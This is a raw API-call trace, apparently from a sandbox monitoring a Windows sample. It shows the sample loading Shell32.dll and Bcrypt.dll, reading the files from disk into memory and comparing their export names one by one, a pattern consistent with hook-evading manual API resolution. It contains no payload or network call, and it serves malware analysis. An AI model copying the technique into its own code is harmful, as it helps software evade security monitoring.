[0225.316] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0225.316] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0225.317] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0225.317] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0225.317] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0225.317] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0225.317] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0225.317] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0225.317] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0225.317] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0225.317] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0225.317] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0225.317] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0225.317] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0225.317] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0225.317] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0225.317] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0225.317] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0225.317] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0225.317] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0225.317] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0225.317] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0225.317] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0228.016] GetProcessHeap () returned 0x480000 [0228.016] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4101040 | out: hHeap=0x480000) returned 1 [0228.022] GetProcessHeap () returned 0x480000 [0228.022] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x4999e0 [0228.023] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0228.023] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0228.023] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0228.023] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0228.023] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0228.023] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0228.023] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0228.023] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0228.023] GetProcessHeap () returned 0x480000 [0228.023] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1587258) returned 0x4109040 [0228.060] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0228.060] ReadFile (in: hFile=0x140, lpBuffer=0x4109040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4109040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0230.746] CloseHandle (hObject=0x140) returned 1 [0230.919] GetProcessHeap () returned 0x480000 [0230.919] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4109040 | out: hHeap=0x480000) returned 1 [0231.760] GetProcessHeap () returned 0x480000 [0231.760] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x499780 [0232.037] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0232.044] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0232.044] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0232.044] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0232.044] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0232.045] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0232.045] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0232.045] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0232.045] GetProcessHeap () returned 0x480000 [0232.045] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x26fa0) returned 0x2d42010 [0232.047] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0232.047] ReadFile (in: hFile=0x15c, lpBuffer=0x2d42010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d42010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0232.050] CloseHandle (hObject=0x15c) returned 1 [0232.050] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0232.051] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0232.051] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0232.051] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0232.051] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.051] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0232.051] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0232.051] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.051] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.051] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0232.051] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0232.051] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.051] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.051] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0232.051] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0232.052] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0232.052] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.052] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.052] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0232.052] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0232.052] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0232.052] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0232.052] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.052] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.052] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0232.052] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0232.052] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0232.052] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0232.053] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0232.053] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.053] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.053] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0232.053] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0232.053] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0232.053] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0232.053] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0232.053] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0232.053] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.053] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.053] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0232.053] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0232.053] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0232.053] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0232.053] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0232.053] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0232.053] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0232.053] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.053] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.053] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0232.053] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0232.053] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0232.054] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0232.054] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0232.054] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0232.054] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0232.055] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.055] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.055] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0232.055] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0232.055] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0232.055] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0232.055] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0232.055] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0232.055] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0232.055] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0232.055] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0232.055] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0232.056] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0232.056] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0232.056] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0232.057] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0232.057] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0232.057] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0232.057] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0232.057] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.057] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.057] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0232.057] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0232.057] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0232.057] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0232.057] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0232.057] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0232.057] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0232.058] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0232.058] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.058] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.059] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0232.059] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0232.059] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0232.059] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0232.059] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0232.059] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0232.059] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0232.059] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0232.059] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0232.059] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0232.059] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0232.059] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0232.059] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0232.059] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0232.059] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0232.059] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0232.059] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.059] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.059] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0232.059] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0232.059] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0232.059] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0232.059] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0232.059] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0232.059] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0232.059] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0232.059] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0232.059] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0232.059] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0232.059] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0232.059] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0232.060] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0232.060] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0232.060] lstrcmpA 